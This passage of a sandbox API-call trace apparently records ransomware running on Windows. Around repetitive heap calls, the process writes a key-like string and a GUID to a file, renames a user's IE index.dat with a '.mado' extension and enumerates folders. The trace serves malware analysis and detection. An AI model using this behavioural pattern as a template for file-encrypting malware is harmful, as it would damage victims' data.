Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b818d8 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817c0 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.612] GetCurrentThreadId () returned 0x600 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b148 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.612] GetCurrentThreadId () returned 0x600 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0206.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d10 [0206.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ce0 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cb0 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d28 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b817c0 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b819f0 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b81b08 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817c0 | out: hHeap=0x2c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81b08 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819f0 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d28 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cb0 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87208 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818d8 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.616] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x7ffb, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x7ffb, lpOverlapped=0x0) returned 1 [0206.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0206.617] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.617] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.617] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.617] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.617] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.617] CloseHandle (hObject=0x63c) returned 1 [0206.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d64f0 [0206.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d64f0 | out: hHeap=0x2c0000) returned 1 [0206.619] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.mado")) returned 1 [0206.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.619] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.620] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UV0DUWVB", cAlternateFileName="")) returned 1 [0206.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d64f0 [0206.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3b2fd8 [0206.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bf70 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6680 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6748 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3293068 | out: hHeap=0x2c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d65b8 | out: hHeap=0x2c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2df0 | out: hHeap=0x2c0000) returned 1 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d64f0 | out: hHeap=0x2c0000) returned 1 [0206.621] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 1 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d64f0 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d65b8 [0206.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.621] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 0 [0206.621] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.621] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77b90 [0206.621] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77ad8 [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0206.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0206.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0206.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87208 [0206.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.622] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.622] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.622] PathFindFileNameW (pszPath="") returned="" [0206.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77ad8 [0206.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.624] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.624] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0206.624] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.624] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0206.624] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 